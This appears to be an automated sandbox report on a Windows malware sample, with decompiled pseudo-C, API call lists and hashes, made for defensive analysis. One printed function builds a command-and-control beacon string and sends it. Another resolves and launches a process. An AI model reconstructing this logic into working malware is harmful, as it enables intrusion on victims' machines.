                                                                                                                                  • Opcode ID: 29491991e5cb9ead286945ef0833d57d3bc7c32fcfb5584e67471eb725f4c58b
                                                                                                                                  • Instruction ID: 3cf955722490d12626ff05c4d7cd76007c92f7d8c1606608647920377fbf0936
                                                                                                                                  • Opcode Fuzzy Hash: 29491991e5cb9ead286945ef0833d57d3bc7c32fcfb5584e67471eb725f4c58b
                                                                                                                                  • Instruction Fuzzy Hash: E502E6B4A40318ABDB20EF51DC46FDF7374AB54706F5041AAF6087A2D1D7B89A84CF98
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 74%
                                                                                                                                  			E022B5450(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
                                                                                                                                  				void* _v8;
                                                                                                                                  				signed int _v12;
                                                                                                                                  				void* _v16;
                                                                                                                                  				void* _v20;
                                                                                                                                  				void* _v24;
                                                                                                                                  				void* _v28;
                                                                                                                                  				void* __ebx;
                                                                                                                                  				void* __edi;
                                                                                                                                  				long _t59;
                                                                                                                                  				intOrPtr _t60;
                                                                                                                                  				intOrPtr _t61;
                                                                                                                                  				intOrPtr _t62;
                                                                                                                                  				intOrPtr _t63;
                                                                                                                                  				intOrPtr _t64;
                                                                                                                                  				void* _t67;
                                                                                                                                  				intOrPtr _t68;
                                                                                                                                  				int _t71;
                                                                                                                                  				void* _t72;
                                                                                                                                  				void* _t73;
                                                                                                                                  				void* _t75;
                                                                                                                                  				void* _t78;
                                                                                                                                  				intOrPtr _t82;
                                                                                                                                  				intOrPtr _t86;
                                                                                                                                  				intOrPtr* _t88;
                                                                                                                                  				void* _t94;
                                                                                                                                  				intOrPtr _t100;
                                                                                                                                  				signed int _t104;
                                                                                                                                  				char** _t106;
                                                                                                                                  				int _t109;
                                                                                                                                  				intOrPtr* _t112;
                                                                                                                                  				intOrPtr* _t114;
                                                                                                                                  				intOrPtr* _t116;
                                                                                                                                  				intOrPtr* _t118;
                                                                                                                                  				intOrPtr _t121;
                                                                                                                                  				intOrPtr _t126;
                                                                                                                                  				int _t130;
                                                                                                                                  				CHAR* _t132;
                                                                                                                                  				intOrPtr _t133;
                                                                                                                                  				void* _t134;
                                                                                                                                  				void* _t143;
                                                                                                                                  				int _t144;
                                                                                                                                  				void* _t145;
                                                                                                                                  				intOrPtr _t146;
                                                                                                                                  				void* _t148;
                                                                                                                                  				long _t152;
                                                                                                                                  				intOrPtr* _t153;
                                                                                                                                  				intOrPtr* _t154;
                                                                                                                                  				intOrPtr* _t157;
                                                                                                                                  				void* _t158;
                                                                                                                                  				void* _t160;
                                                                                                                                  
                                                                                                                                  				_t143 = __edx;
                                                                                                                                  				_t134 = __ecx;
                                                                                                                                  				_t59 = __eax;
                                                                                                                                  				_v12 = 8;
                                                                                                                                  				if(__eax == 0) {
                                                                                                                                  					_t59 = GetTickCount();
                                                                                                                                  				}
                                                                                                                                  				_t60 =  *0x22bd018; // 0x139c7884
                                                                                                                                  				asm("bswap eax");
                                                                                                                                  				_t61 =  *0x22bd014; // 0x3a87c8cd
                                                                                                                                  				_t132 = _a16;
                                                                                                                                  				asm("bswap eax");
                                                                                                                                  				_t62 =  *0x22bd010; // 0xd8d2f808
                                                                                                                                  				asm("bswap eax");
                                                                                                                                  				_t63 =  *0x22bd00c; // 0xeec43f25
                                                                                                                                  				asm("bswap eax");
                                                                                                                                  				_t64 =  *0x22bd2a8; // 0x24ba5a8
                                                                                                                                  				_t3 = _t64 + 0x22be633; // 0x74666f73 (wsprintfA format string; first four bytes are ASCII "soft")
                                                                                                                                  				_t144 = wsprintfA(_t132, _t3, 3, 0x3d163, _t63, _t62, _t61, _t60,  *0x22bd02c,  *0x22bd004, _t59);
                                                                                                                                  				_t67 = E022B3288();
                                                                                                                                  				_t68 =  *0x22bd2a8; // 0x24ba5a8
                                                                                                                                  				_t4 = _t68 + 0x22be673; // 0x74707526 (wsprintfA format string; first four bytes are ASCII "&upt")
                                                                                                                                  				_t71 = wsprintfA(_t144 + _t132, _t4, _t67);
                                                                                                                                  				_t160 = _t158 + 0x38;
                                                                                                                                  				_t145 = _t144 + _t71;
                                                                                                                                  				_t72 = E022B831C(_t134);
                                                                                                                                  				_t133 = __imp__; // 0x74e05520
                                                                                                                                  				_v8 = _t72;
                                                                                                                                  				if(_t72 != 0) {
                                                                                                                                  					_t126 =  *0x22bd2a8; // 0x24ba5a8
                                                                                                                                  					_t7 = _t126 + 0x22be8d4; // 0x736e6426 (wsprintfA format string; first four bytes are ASCII "&dns")
                                                                                                                                  					_t130 = wsprintfA(_a16 + _t145, _t7, _t72);
                                                                                                                                  					_t160 = _t160 + 0xc;
                                                                                                                                  					_t145 = _t145 + _t130;
                                                                                                                                  					HeapFree( *0x22bd238, 0, _v8);
                                                                                                                                  				}
                                                                                                                                  				_t73 = E022B9267();
                                                                                                                                  				_v8 = _t73;
                                                                                                                                  				if(_t73 != 0) {
                                                                                                                                  					_t121 =  *0x22bd2a8; // 0x24ba5a8
                                                                                                                                  					_t11 = _t121 + 0x22be8dc; // 0x6f687726 (wsprintfA format string; first four bytes are ASCII "&who")
                                                                                                                                  					wsprintfA(_t145 + _a16, _t11, _t73);
                                                                                                                                  					_t160 = _t160 + 0xc;
                                                                                                                                  					HeapFree( *0x22bd238, 0, _v8);
                                                                                                                                  				}
                                                                                                                                  				_t146 =  *0x22bd32c; // 0x47795b0
                                                                                                                                  				_t75 = E022B284E(0x22bd00a, _t146 + 4);
                                                                                                                                  				_t152 = 0;
                                                                                                                                  				_v20 = _t75;
                                                                                                                                  				if(_t75 == 0) {
                                                                                                                                  					L26:
                                                                                                                                  					HeapFree( *0x22bd238, _t152, _a16);
                                                                                                                                  					return _v12;
                                                                                                                                  				} else {
                                                                                                                                  					_t78 = RtlAllocateHeap( *0x22bd238, 0, 0x800);
                                                                                                                                  					_v8 = _t78;
                                                                                                                                  					if(_t78 == 0) {
                                                                                                                                  						L25:
                                                                                                                                  						HeapFree( *0x22bd238, _t152, _v20);
                                                                                                                                  						goto L26;
                                                                                                                                  					}
                                                                                                                                  					E022B3239(GetTickCount());
                                                                                                                                  					_t82 =  *0x22bd32c; // 0x47795b0
                                                                                                                                  					__imp__(_t82 + 0x40);
                                                                                                                                  					asm("lock xadd [eax], ecx");
                                                                                                                                  					_t86 =  *0x22bd32c; // 0x47795b0
                                                                                                                                  					__imp__(_t86 + 0x40);
                                                                                                                                  					_t88 =  *0x22bd32c; // 0x47795b0
                                                                                                                                  					_t148 = E022B7B8D(1, _t143, _a16,  *_t88);
                                                                                                                                  					_v28 = _t148;
                                                                                                                                  					asm("lock xadd [eax], ecx");
                                                                                                                                  					if(_t148 == 0) {
                                                                                                                                  						L24:
                                                                                                                                  						HeapFree( *0x22bd238, _t152, _v8);
                                                                                                                                  						goto L25;
                                                                                                                                  					}
                                                                                                                                  					StrTrimA(_t148, 0x22bc28c);
                                                                                                                                  					_push(_t148);
                                                                                                                                  					_t94 = E022BA677();
                                                                                                                                  					_v16 = _t94;
                                                                                                                                  					if(_t94 == 0) {
                                                                                                                                  						L23:
                                                                                                                                  						HeapFree( *0x22bd238, _t152, _t148);
                                                                                                                                  						goto L24;
                                                                                                                                  					}
                                                                                                                                  					_t153 = __imp__;
                                                                                                                                  					 *_t153(_t148, _a4);
                                                                                                                                  					 *_t153(_v8, _v20);
                                                                                                                                  					_t154 = __imp__;
                                                                                                                                  					 *_t154(_v8, _v16);
                                                                                                                                  					_t100 = E022B7B3B( *_t154(_v8, _t148), _v8);
                                                                                                                                  					_a4 = _t100;
                                                                                                                                  					if(_t100 == 0) {
                                                                                                                                  						_v12 = 8;
                                                                                                                                  						L21:
                                                                                                                                  						E022B5433();
                                                                                                                                  						L22:
                                                                                                                                  						HeapFree( *0x22bd238, 0, _v16);
                                                                                                                                  						_t152 = 0;
                                                                                                                                  						goto L23;
                                                                                                                                  					}
                                                                                                                                  					_t104 = E022B9F33(_t133, 0xffffffffffffffff, _t148,  &_v24);
                                                                                                                                  					_v12 = _t104;
                                                                                                                                  					if(_t104 == 0) {
                                                                                                                                  						_t157 = _v24;
                                                                                                                                  						_v12 = E022B137B(_t157, _a4, _a8, _a12);
                                                                                                                                  						_t112 =  *((intOrPtr*)(_t157 + 8));
                                                                                                                                  						 *((intOrPtr*)( *_t112 + 0x80))(_t112);
                                                                                                                                  						_t114 =  *((intOrPtr*)(_t157 + 8));
                                                                                                                                  						 *((intOrPtr*)( *_t114 + 8))(_t114);
                                                                                                                                  						_t116 =  *((intOrPtr*)(_t157 + 4));
                                                                                                                                  						 *((intOrPtr*)( *_t116 + 8))(_t116);
                                                                                                                                  						_t118 =  *_t157;
                                                                                                                                  						 *((intOrPtr*)( *_t118 + 8))(_t118);
                                                                                                                                  						E022B8B22(_t157);
                                                                                                                                  					}
                                                                                                                                  					if(_v12 != 0x10d2) {
                                                                                                                                  						L16:
                                                                                                                                  						if(_v12 == 0) {
                                                                                                                                  							_t106 = _a8;
                                                                                                                                  							if(_t106 != 0) {
                                                                                                                                  								_t149 =  *_t106;
                                                                                                                                  								_t155 =  *_a12;
                                                                                                                                  								wcstombs( *_t106,  *_t106,  *_a12);
                                                                                                                                  								_t109 = E022B7953(_t149, _t149, _t155 >> 1);
                                                                                                                                  								_t148 = _v28;
                                                                                                                                  								 *_a12 = _t109;
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  						goto L19;
                                                                                                                                  					} else {
                                                                                                                                  						if(_a8 != 0) {
                                                                                                                                  							L19:
                                                                                                                                  							E022B8B22(_a4);
                                                                                                                                  							if(_v12 == 0 || _v12 == 0x10d2) {
                                                                                                                                  								goto L22;
                                                                                                                                  							} else {
                                                                                                                                  								goto L21;
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  						_v12 = _v12 & 0x00000000;
                                                                                                                                  						goto L16;
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  			}






















































                                                                                                                                  APIs
                                                                                                                                  • GetTickCount.KERNEL32 ref: 022B5464
                                                                                                                                  • wsprintfA.USER32 ref: 022B54B4
                                                                                                                                  • wsprintfA.USER32 ref: 022B54D1
                                                                                                                                  • wsprintfA.USER32 ref: 022B54FD
                                                                                                                                  • HeapFree.KERNEL32(00000000,?), ref: 022B550F
                                                                                                                                  • wsprintfA.USER32 ref: 022B5530
                                                                                                                                  • HeapFree.KERNEL32(00000000,?), ref: 022B5540
                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 022B556E
                                                                                                                                  • GetTickCount.KERNEL32 ref: 022B557F
                                                                                                                                  • RtlEnterCriticalSection.NTDLL(04779570), ref: 022B5593
                                                                                                                                  • RtlLeaveCriticalSection.NTDLL(04779570), ref: 022B55B1
                                                                                                                                    • Part of subcall function 022B7B8D: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7691C740,?,?,022B9DA0,?,047795B0), ref: 022B7BB8
                                                                                                                                    • Part of subcall function 022B7B8D: lstrlen.KERNEL32(?,?,?,022B9DA0,?,047795B0), ref: 022B7BC0
                                                                                                                                    • Part of subcall function 022B7B8D: strcpy.NTDLL ref: 022B7BD7
                                                                                                                                    • Part of subcall function 022B7B8D: lstrcat.KERNEL32(00000000,?), ref: 022B7BE2
                                                                                                                                    • Part of subcall function 022B7B8D: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,022B9DA0,?,047795B0), ref: 022B7BFF
                                                                                                                                  • StrTrimA.SHLWAPI(00000000,022BC28C,?,047795B0), ref: 022B55E8
                                                                                                                                    • Part of subcall function 022BA677: lstrlen.KERNEL32(04779BF8,00000000,00000000,7691C740,022B9DCB,00000000), ref: 022BA687
                                                                                                                                    • Part of subcall function 022BA677: lstrlen.KERNEL32(?), ref: 022BA68F
                                                                                                                                    • Part of subcall function 022BA677: lstrcpy.KERNEL32(00000000,04779BF8), ref: 022BA6A3
                                                                                                                                    • Part of subcall function 022BA677: lstrcat.KERNEL32(00000000,?), ref: 022BA6AE
                                                                                                                                  • lstrcpy.KERNEL32(00000000,?), ref: 022B5609
                                                                                                                                  • lstrcpy.KERNEL32(?,?), ref: 022B5611
                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 022B561F
                                                                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 022B5625
                                                                                                                                    • Part of subcall function 022B7B3B: lstrlen.KERNEL32(?,00000000,04779C18,00000000,022B5142,04779E3B,?,?,?,?,?,69B25F44,00000005,022BD00C), ref: 022B7B42
                                                                                                                                    • Part of subcall function 022B7B3B: mbstowcs.NTDLL ref: 022B7B6B
                                                                                                                                    • Part of subcall function 022B7B3B: memset.NTDLL ref: 022B7B7D
                                                                                                                                  • wcstombs.NTDLL ref: 022B56B6
                                                                                                                                    • Part of subcall function 022B137B: SysAllocString.OLEAUT32(?), ref: 022B13B6
                                                                                                                                    • Part of subcall function 022B8B22: RtlFreeHeap.NTDLL(00000000,00000000,022B131A,00000000,?,?,00000000), ref: 022B8B2E
                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?), ref: 022B56F7
                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 022B5703
                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,047795B0), ref: 022B570F
                                                                                                                                  • HeapFree.KERNEL32(00000000,?), ref: 022B571B
                                                                                                                                  • HeapFree.KERNEL32(00000000,?), ref: 022B5727
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
                                                                                                                                  • String ID: Ut
                                                                                                                                  • API String ID: 3748877296-8415677
                                                                                                                                  • Opcode ID: 8dc819f8307cff2afdc2be958d5d66a015661aa50408b0a5d3abc5872eec64bf
                                                                                                                                  • Instruction ID: 7b7ead74b19c89499723649987438689d052967554946676977ccc64b66a4515
                                                                                                                                  • Opcode Fuzzy Hash: 8dc819f8307cff2afdc2be958d5d66a015661aa50408b0a5d3abc5872eec64bf
                                                                                                                                  • Instruction Fuzzy Hash: 79913671D00249AFCB129FE4EC88AEEBBB9EF08390F544855F404AB261D770D961DF60
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.558355607.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _get_int64_arg_write_multi_char$__aulldiv__aullrem_wctomb_s_write_string
                                                                                                                                  • String ID: -$9
                                                                                                                                  • API String ID: 3451365851-1631151375
                                                                                                                                  • Opcode ID: e28aa4a69d47067587227fdaa3a01ec24bcfd6af5c749e57e9b6fedd5fc2f0d6
                                                                                                                                  • Instruction ID: 78399884fce185727bffb77cafe4c36f3e4e9afbfefd6c32b9dddc601960937f
                                                                                                                                  • Opcode Fuzzy Hash: e28aa4a69d47067587227fdaa3a01ec24bcfd6af5c749e57e9b6fedd5fc2f0d6
                                                                                                                                  • Instruction Fuzzy Hash: 1EF138B1E012299FDB24CF59DC89BAEB7B1BB44304F5481DAE409A7241D7389E90CF5A
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.558355607.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _get_int64_arg_write_multi_char$__aulldiv__aullrem__mbtowc_l_write_string
                                                                                                                                  • String ID: 9
                                                                                                                                  • API String ID: 3455034128-2366072709
                                                                                                                                  • Opcode ID: 6bba68cdb59bf134c0e80eea741eb4f53aa035d0e13288ddc792c03e4895b889
                                                                                                                                  • Instruction ID: 796ac3fced5700d4f5f18dad2ebcc49880b952f527cf27073e5d3226421308ad
                                                                                                                                  • Opcode Fuzzy Hash: 6bba68cdb59bf134c0e80eea741eb4f53aa035d0e13288ddc792c03e4895b889
                                                                                                                                  • Instruction Fuzzy Hash: FCF159B1E002299FDB24CF54DC81BAEB7B5FF44304F54859AE609AB241D738AE84CF59
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • _LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 00426CBB
                                                                                                                                  • _LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 00426CF1
                                                                                                                                  • _LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 00426D12
                                                                                                                                  • wcsncnt.LIBCMTD ref: 00426D49
                                                                                                                                  • _LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 00426DAF
                                                                                                                                  • _LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 00427000
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.558355607.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Locale$UpdateUpdate::~_$wcsncnt
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 986326057-0
                                                                                                                                  • Opcode ID: 2a43658202f0a90367dc1493f1fbb92a5c45b10ef9694ece1ab0ee1f2c4bbf55
                                                                                                                                  • Instruction ID: 8cfb70372d27b63b160320ae70223e227e1ad5482f44b3afdf2ea89d459a2268
                                                                                                                                  • Opcode Fuzzy Hash: 2a43658202f0a90367dc1493f1fbb92a5c45b10ef9694ece1ab0ee1f2c4bbf55
                                                                                                                                  • Instruction Fuzzy Hash: 80E14931A00218EFCF04DF95D894AEEB7B1FF48304F61815AE5116B292DB38AE45DF98
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.558355607.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Locale_write_multi_char$UpdateUpdate::~___get_printf_count_output__invalid_parameter_get_int_arg_wctomb_s_write_string
                                                                                                                                  • String ID: -
                                                                                                                                  • API String ID: 2357813345-2547889144
                                                                                                                                  • Opcode ID: 330b75ef8c6b94f476b8245b549597da44c28c4e36eedd74208aa3d818deb831
                                                                                                                                  • Instruction ID: c7b1d3cc8446317dede7de281db646664f679c0e1627e2bd15bdc199bea1a6db
                                                                                                                                  • Opcode Fuzzy Hash: 330b75ef8c6b94f476b8245b549597da44c28c4e36eedd74208aa3d818deb831
                                                                                                                                  • Instruction Fuzzy Hash: FFA1BDB0E002299BDB24DF55DC49BEEB7B1AF44304F5480DAE9097B281D7785EA0CF5A
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.558355607.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _write_multi_char$_get_int_arg_strlen_wctomb_s_write_string
                                                                                                                                  • String ID: -
                                                                                                                                  • API String ID: 2232461714-2547889144
                                                                                                                                  • Opcode ID: 9b38da79696b48017a79a3751c51525cb983d411d580641f96091f56c5ccbf54
                                                                                                                                  • Instruction ID: b22f749457ebff07bd857113f7dd6d7d17d22ad384d3b6ba7fe93d6b2696a21c
                                                                                                                                  • Opcode Fuzzy Hash: 9b38da79696b48017a79a3751c51525cb983d411d580641f96091f56c5ccbf54
                                                                                                                                  • Instruction Fuzzy Hash: 4AA18CB0E012299FDB24CF54DC89BEEB7B1AF44305F5481DAD8096B281D7789E90CF5A
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.558355607.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Locale_write_multi_char$UpdateUpdate::~___get_printf_count_output__invalid_parameter__mbtowc_l_get_int_arg_write_string
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2386203720-0
                                                                                                                                  • Opcode ID: 6b55c97c5d38f768529eb9a498839eb9daa0eabcb21bb336c34a87882dc5178e
                                                                                                                                  • Instruction ID: c33fd31c84656c292cbdda4970a5ae32323cfa70d71a33a586563bb88af25e5f
                                                                                                                                  • Opcode Fuzzy Hash: 6b55c97c5d38f768529eb9a498839eb9daa0eabcb21bb336c34a87882dc5178e
                                                                                                                                  • Instruction Fuzzy Hash: C3A1A1B0E002299BDB24DF55DC81BAEB375EB44304F54409AE60A7B282D778AEC4CF5D
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • _memset.LIBCMT ref: 00426298
                                                                                                                                  • _LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 004262AD
                                                                                                                                  • _memset.LIBCMT ref: 00426334
                                                                                                                                  • __invalid_parameter.LIBCMTD ref: 00426394
                                                                                                                                  • _LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 004263A6
                                                                                                                                  • _LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 004263E1
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.558355607.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Locale$UpdateUpdate::~_$_memset$__invalid_parameter
                                                                                                                                  • String ID: "$P
                                                                                                                                  • API String ID: 2173491032-1577843662
                                                                                                                                  • Opcode ID: f33f6cca13dd0591231f2ea0095d8a183edf30a1ce6d78efc314899412832e97
                                                                                                                                  • Instruction ID: c21a4939274ed4271e1687e0555496556df4f02c4c28587b6b88aa2db893d203
                                                                                                                                  • Opcode Fuzzy Hash: f33f6cca13dd0591231f2ea0095d8a183edf30a1ce6d78efc314899412832e97
                                                                                                                                  • Instruction Fuzzy Hash: DA51BC30A00219DBCF24DF99E846AAE7770FF44314F61862AEC255B3D1D3789996CF98
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 73%
                                                                                                                                  			E022B3485(void* __eax, void* __ecx) {
                                                                                                                                  				long _v8;
                                                                                                                                  				char _v12;
                                                                                                                                  				void* _v16;
                                                                                                                                  				void* _v28;
                                                                                                                                  				long _v32;
                                                                                                                                  				void _v104;
                                                                                                                                  				char _v108;
                                                                                                                                  				long _t36;
                                                                                                                                  				intOrPtr _t40;
                                                                                                                                  				intOrPtr _t47;
                                                                                                                                  				intOrPtr _t50;
                                                                                                                                  				void* _t58;
                                                                                                                                  				void* _t68;
                                                                                                                                  				intOrPtr* _t70;
                                                                                                                                  				intOrPtr* _t71;
                                                                                                                                  
                                                                                                                                  				_t1 = __eax + 0x14; // 0x74183966
                                                                                                                                  				_t69 =  *_t1;
                                                                                                                                  				_t36 = E022B4944(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
                                                                                                                                  				_v8 = _t36;
                                                                                                                                  				if(_t36 != 0) {
                                                                                                                                  					L12:
                                                                                                                                  					return _v8;
                                                                                                                                  				}
                                                                                                                                  				E022BA789( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
                                                                                                                                  				_t40 = _v12(_v12);
                                                                                                                                  				_v8 = _t40;
                                                                                                                                  				if(_t40 == 0 && ( *0x22bd260 & 0x00000001) != 0) {
                                                                                                                                  					_v32 = 0;
                                                                                                                                  					asm("stosd");
                                                                                                                                  					asm("stosd");
                                                                                                                                  					asm("stosd");
                                                                                                                                  					_v108 = 0;
                                                                                                                                  					memset( &_v104, 0, 0x40);
                                                                                                                                  					_t47 =  *0x22bd2a8; // 0x24ba5a8
                                                                                                                                  					_t18 = _t47 + 0x22be3e6; // 0x73797325
                                                                                                                                  					_t68 = E022B7912(_t18);
                                                                                                                                  					if(_t68 == 0) {
                                                                                                                                  						_v8 = 8;
                                                                                                                                  					} else {
                                                                                                                                  						_t50 =  *0x22bd2a8; // 0x24ba5a8
                                                                                                                                  						_t19 = _t50 + 0x22be747; // 0x4778cef
                                                                                                                                  						_t20 = _t50 + 0x22be0af; // 0x4e52454b
                                                                                                                                  						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
                                                                                                                                  						if(_t71 == 0) {
                                                                                                                                  							_v8 = 0x7f;
                                                                                                                                  						} else {
                                                                                                                                  							_v108 = 0x44;
                                                                                                                                  							E022B3179();
                                                                                                                                  							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
                                                                                                                                  							_push(1);
                                                                                                                                  							E022B3179();
                                                                                                                                  							if(_t58 == 0) {
                                                                                                                                  								_v8 = GetLastError();
                                                                                                                                  							} else {
                                                                                                                                  								CloseHandle(_v28);
                                                                                                                                  								CloseHandle(_v32);
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  						HeapFree( *0x22bd238, 0, _t68);
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  				_t70 = _v16;
                                                                                                                                  				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
                                                                                                                                  				E022B8B22(_t70);
                                                                                                                                  				goto L12;
                                                                                                                                  			}


















                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 022B4944: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,022B34A1,?,00000001,?,?,00000000,00000000), ref: 022B4969
                                                                                                                                    • Part of subcall function 022B4944: GetProcAddress.KERNEL32(00000000,7243775A), ref: 022B498B
                                                                                                                                    • Part of subcall function 022B4944: GetProcAddress.KERNEL32(00000000,614D775A), ref: 022B49A1
                                                                                                                                    • Part of subcall function 022B4944: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 022B49B7
                                                                                                                                    • Part of subcall function 022B4944: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 022B49CD
                                                                                                                                    • Part of subcall function 022B4944: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 022B49E3
                                                                                                                                  • memset.NTDLL ref: 022B34EF
                                                                                                                                    • Part of subcall function 022B7912: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,022B3508,73797325), ref: 022B7923
                                                                                                                                    • Part of subcall function 022B7912: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 022B793D
                                                                                                                                  • GetModuleHandleA.KERNEL32(4E52454B,04778CEF,73797325), ref: 022B3525
                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 022B352C
                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000), ref: 022B3594
                                                                                                                                    • Part of subcall function 022B3179: GetProcAddress.KERNEL32(36776F57,022B8BDC), ref: 022B3194
                                                                                                                                  • CloseHandle.KERNEL32(00000000,00000001), ref: 022B3571
                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 022B3576
                                                                                                                                  • GetLastError.KERNEL32(00000001), ref: 022B357A
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
                                                                                                                                  • String ID: Ut
                                                                                                                                  • API String ID: 3075724336-8415677
                                                                                                                                  • Opcode ID: c15912badca4d28057a9b9eddee3c7cc8568ca65622a541c5d8dc1cfdd77ba9f
                                                                                                                                  • Instruction ID: fd1dff70a4592921381452b0b421e4e5a0e3ca2845c29e239a11e8732865da3f
                                                                                                                                  • Opcode Fuzzy Hash: c15912badca4d28057a9b9eddee3c7cc8568ca65622a541c5d8dc1cfdd77ba9f
                                                                                                                                  • Instruction Fuzzy Hash: EC3130B2C10209AFDB12EFE4D888DDEBBBDEF08344F054965E605A7115D770AA58DB50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.558355607.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _write_multi_char$__mbtowc_l_get_int_arg_strlen_write_string
                                                                                                                                  • String ID:
